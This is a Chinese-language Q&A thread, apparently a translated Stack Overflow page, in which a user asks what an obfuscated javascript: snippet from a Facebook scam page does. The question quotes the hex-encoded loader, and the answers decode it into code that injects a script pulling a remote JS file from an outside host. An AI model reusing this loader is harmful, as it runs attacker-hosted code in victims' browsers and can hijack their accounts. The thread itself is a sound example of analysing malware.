2

我在这里的 Facebook 病毒页面中找到了这个 javascript 。我认为代码是恶意的,所以我想知道它的作用。这是代码:

javascript: var _0xa064=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x64\x74\x67\x2D\x63\x73\x2E\x68\x6F\x73\x74\x6F\x69\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x65\x73\x6F\x72\x69\x63\x61\x2F\x66\x75\x72\x6B\x61\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xa064[2]](_0xa064[1]))[_0xa064[0]]=_0xa064[3];b[_0xa064[5]][_0xa064[4]](a); void (0);
4

3 回答 3

8
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js';
b['body']['appendChild'](a);
void(0);
于 2011-04-22T13:56:58.497 回答
2

它创建一个导入的脚本标签

dtg-cs.hostoi.com/profesorica/furka.js

我强烈怀疑这是恶意的。

编辑——因为该脚本在各种 ajax 请求中包含对名为“penis-xd.jpg”的文件的引用,我认为我们绝对可以将其视为恶意 :-)

于 2011-04-22T13:58:05.563 回答
0

它尝试加载:dtg-cs.hostoi.com/profesorica/furka.js

于 2011-04-22T14:03:24.243 回答